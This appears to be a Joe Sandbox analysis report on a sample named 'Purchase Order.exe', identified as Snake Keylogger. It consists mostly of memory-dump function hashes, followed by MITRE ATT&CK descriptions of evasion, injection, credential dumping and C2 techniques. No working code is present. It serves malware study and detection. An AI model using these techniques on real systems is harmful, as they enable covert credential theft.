Function 06B25618 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fbf540d531cb5e046f549761fc45ea01e29e7371e407bc80694d54b0839711
Instruction ID: 6117d94831c66bdcb637fc02960282af4c7387543b408ba91aa4935eb5b4e133
Opcode Fuzzy Hash: 49fbf540d531cb5e046f549761fc45ea01e29e7371e407bc80694d54b0839711
Instruction Fuzzy Hash: 0FC19E74E01228CFDB64DFA5C994B9DBBB2FF89300F2081A9D409AB365DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B25A70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1aa2504dd3b9f9b4babb8510287a6445d7dd89b4aed91ccaf252ba3e92e470f
Instruction ID: 441db4f9c6e58b79f926aa58c4db4c23b74ad9177aeeda9bc62070d730b04ddf
Opcode Fuzzy Hash: b1aa2504dd3b9f9b4babb8510287a6445d7dd89b4aed91ccaf252ba3e92e470f
Instruction Fuzzy Hash: E9C19E74E01228CFDB64DFA5C994B9DBBB2FF89300F2081A9D409AB364DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B26BD0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdae840aadf5b361a2820118bcd2dcf8c654bd468579475895e672ee259b1af
Instruction ID: 603b598e2ed7625539e7823d1cc3ad630588fa3d7733490230d0f7d59fd18254
Opcode Fuzzy Hash: fcdae840aadf5b361a2820118bcd2dcf8c654bd468579475895e672ee259b1af
Instruction Fuzzy Hash: 59C19E74E01228CFDB54DFA5C994B9DBBB2FF89301F2081A9D409AB364EB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B26320 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6445227f352be44ac64eeb89962cc17a9fc1e691b69b3e0c46f69090f7cfb3e
Instruction ID: 783d48c4e7101ddc59df6182bb1dafdc5a96fc2482535ac1e65b45e97da55318
Opcode Fuzzy Hash: b6445227f352be44ac64eeb89962cc17a9fc1e691b69b3e0c46f69090f7cfb3e
Instruction Fuzzy Hash: 32C1AF74E00228CFDB54DFA5D994B9DBBB2FF89300F2081A9D809AB365DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B26778 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abaa14bb829385b9445414182242f04d938950a714057e118a61c7fe5ed0af8e
Instruction ID: 830f8d1aa1c40991ff6930905815d6cdb951aeaffcd85e0039afa6101570a714
Opcode Fuzzy Hash: abaa14bb829385b9445414182242f04d938950a714057e118a61c7fe5ed0af8e
Instruction Fuzzy Hash: D6C18F74E01228CFDB54DFA5C994B9DBBB2EF89300F2081A9D409AB355EB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B274A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc426607b7a713c455351cc7e424b3eda538c5e7a7550318e0de2be70ea7f27a
Instruction ID: 6e8561e856ae558101701ec03c0d9c86f230b76605ff26ee4bd3cc16e9b5e78d
Opcode Fuzzy Hash: dc426607b7a713c455351cc7e424b3eda538c5e7a7550318e0de2be70ea7f27a
Instruction Fuzzy Hash: 5EC1AE74E01228CFDB54DFA5C984B9DBBF2EF89300F2081A9D809AB365DB355A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06B20498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19bec59cd68d9f6ad7a9e07f00f42d0d4a33e0b252ff06d159f37783299eb513
Instruction ID: 25dc15960d8d3bced1a21001889a738706ef7428af820bb66336916ec56cd952
Opcode Fuzzy Hash: 19bec59cd68d9f6ad7a9e07f00f42d0d4a33e0b252ff06d159f37783299eb513
Instruction Fuzzy Hash: 7EC18F74E01228CFDB54EFA5C994B9DBBF2EF89300F2081A9D409AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B208F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a1d30b850c556ec9da49e200eaa08b040406f4ff661732565132952e702070
Instruction ID: 0fa8a197fd101defd6ae735ab3e7d7d923e552f0d0cd0b54c1cc97eb3e782655
Opcode Fuzzy Hash: a3a1d30b850c556ec9da49e200eaa08b040406f4ff661732565132952e702070
Instruction Fuzzy Hash: 3DC19F74E00228CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B27050 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e1399963f29c2873f0c88dc4f180488c7c7bc506bf130807f4b794e5a043d6
Instruction ID: bced31ac8c941847aa1027f7502a986b3f4f8671e87922ff6926a5f36e4ae7db
Opcode Fuzzy Hash: 16e1399963f29c2873f0c88dc4f180488c7c7bc506bf130807f4b794e5a043d6
Instruction Fuzzy Hash: F6C1AEB4E01228CFDB54DFA5C994B9DBBB2EF89300F2081A9D409AB364DB355A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06B20040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac7880c005edd04ee7aea32e790fd521777b5f6efc620bfbbce2a51f95c76eb
Instruction ID: 9ddabef58a077d4e610ae5907f87bc1269e1511e284c829178b30e587ad86f19
Opcode Fuzzy Hash: fac7880c005edd04ee7aea32e790fd521777b5f6efc620bfbbce2a51f95c76eb
Instruction Fuzzy Hash: 6AC19F74E00228CFDB54EFA5C994B9DBBF2EF89301F2081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B281B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16042f95d36205927259c1265ba03b5fffaa7c64df222999e70010c1b8deeb11
Instruction ID: 38d61e075f263a398b3ae86214eb0884f25e214310b2cf44856c479ae6d6c026
Opcode Fuzzy Hash: 16042f95d36205927259c1265ba03b5fffaa7c64df222999e70010c1b8deeb11
Instruction Fuzzy Hash: 97C19F74E01228CFDB54DFA5C994B9DBBB2FF89301F2081A9D409AB354DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B25198 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450ebb6ed00d9d67ce69ef74a951f6a82fba7f9a016d4a2a4d30e4879bb175ad
Instruction ID: 2ae614e7afb6185ca08da980dccdc5e3dd3e026f0c43909b13cde3683cf5353e
Opcode Fuzzy Hash: 450ebb6ed00d9d67ce69ef74a951f6a82fba7f9a016d4a2a4d30e4879bb175ad
Instruction Fuzzy Hash: D4C19EB4E01228CFDB64DFA5C994B9DBBB2AF89300F2081A9D409AB354DB355A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 06B27900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5e316347167c0d945527a3c0a0770d23948be03ff72a947eb558d98279ff25
Instruction ID: 941598f5e1ac454545e8f23cbcd9e6a86970b85edd18f74a839ae62619ad1473
Opcode Fuzzy Hash: 9b5e316347167c0d945527a3c0a0770d23948be03ff72a947eb558d98279ff25
Instruction Fuzzy Hash: 4DC1BF74E00229CFDB54DFA5C994B9DBBB2FF89300F2081AAD809AB354DB355A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06B27D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2142fe4775c165693b9876b05b2bebad3d3caea114473ada0ed3967389ea982
Instruction ID: b84933e22645d03fee7e65a4d2577117fa3c8ecc34d11dc66e0cadf305a6f545
Opcode Fuzzy Hash: b2142fe4775c165693b9876b05b2bebad3d3caea114473ada0ed3967389ea982
Instruction Fuzzy Hash: 1EC19EB4E01228CFDB54DFA5C994B9DBBB2EF89301F2081A9D409AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 06B20D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d30b937c22f424fff140b2c8e7f32db8779dc9f46b7d1dbc7c81e2114f114f7
Instruction ID: f7b40c90c6e0b8ba86b406fbdff55c2d7d687c28f31fc735e38d6e330a80d780
Opcode Fuzzy Hash: 1d30b937c22f424fff140b2c8e7f32db8779dc9f46b7d1dbc7c81e2114f114f7
Instruction Fuzzy Hash: DBC18D74E01228CFDB54DFA9C994B9DBBB2EF89301F2081A9D809AB355DB355A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 052DE943 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f1b558841a684e3c54597003182454126a3d429197d134098e37e1a2d59009
Instruction ID: b93d4aeb83e4b6961c4cfa5dea8a03393360f6b51011b0867bce8b30fdc80f33
Opcode Fuzzy Hash: c1f1b558841a684e3c54597003182454126a3d429197d134098e37e1a2d59009
Instruction Fuzzy Hash: 83A1AD74A15228CFDB64DF24C884B9ABBB2BF49300F1085EAE40DAB354DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 052DEB23 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74d93cc9ebfe38af79fb9ce95792e5803661332edf289414a9cb41613ede65d
Instruction ID: 44701e93bf28549463384bbccd309fe76ccaa8faad72923a88029f4e5e71f2a3
Opcode Fuzzy Hash: a74d93cc9ebfe38af79fb9ce95792e5803661332edf289414a9cb41613ede65d
Instruction Fuzzy Hash: A7519374A15228CFCB64DF24C994B99B7B6FF4A301F5085EAE40AAB354CB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06B236CE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4456652258.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29722346767637c75b7ef9da38a6c2800f5b511442bec0edcdffb817ba84a804
Instruction ID: 734d7629c8617848642ff7ec41f43c57356ac7e969ad6d16470c1dba96f45c93
Opcode Fuzzy Hash: 29722346767637c75b7ef9da38a6c2800f5b511442bec0edcdffb817ba84a804
Instruction Fuzzy Hash: B2D06775E54269CACB20DF6898443ADF7B1EF86200F0025958509B7240D7319E558A26

Uniqueness

Uniqueness Score: -1.00%

Function 052D3FBD Relevance: 7.6, Strings: 6, Instructions: 64COMMON

Download Yara Rule

Strings

p, xrefs: 052D4002
p, xrefs: 052D3FE2
p, xrefs: 052D4012
p, xrefs: 052D3FC2
p, xrefs: 052D3FF2
p, xrefs: 052D4062

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID: p$p$p$p$p$p
API String ID: 0-222779563
Opcode ID: 6511888c2079694e6be3ee4b81f3741567abb691297cb798ac614842245d35b4
Instruction ID: 869246023809beb9889177a900608ff92ebd8837aa202c1af1f097efbec5a6a1
Opcode Fuzzy Hash: 6511888c2079694e6be3ee4b81f3741567abb691297cb798ac614842245d35b4
Instruction Fuzzy Hash: E91181A6E0D7C54FD7014B74E89D3863F649F22389F4D02DA8CD8CB0D3E65D450A8762

Uniqueness

Uniqueness Score: -1.00%

Function 052D60E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;cq, xrefs: 052D611A
\;cq, xrefs: 052D60F4
\;cq, xrefs: 052D6126
\;cq, xrefs: 052D60FE

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID: \;cq$\;cq$\;cq$\;cq
API String ID: 0-2961067002
Opcode ID: 42b30f1ef9ef5cae6e5914946a6b4a3272243433f7edbead4a479114e92d6157
Instruction ID: 97a377f2782b10e5f74c4649a43d976a28f3572c038df14e5561ac1fb3d6f8b9
Opcode Fuzzy Hash: 42b30f1ef9ef5cae6e5914946a6b4a3272243433f7edbead4a479114e92d6157
Instruction Fuzzy Hash: 2D012C317300168F8F24DE2DC854A26F7E7BFD9660725416AE40ACB3A2DA71EC4187A1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
Purchase Order.exe

Function 06C243ED Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 06C243F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0094B038 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Function 0094590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 009444B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 06C2416A Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Function 06C24170 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0094D918 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 06C23FD0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 06C24258 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 0094BA30 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre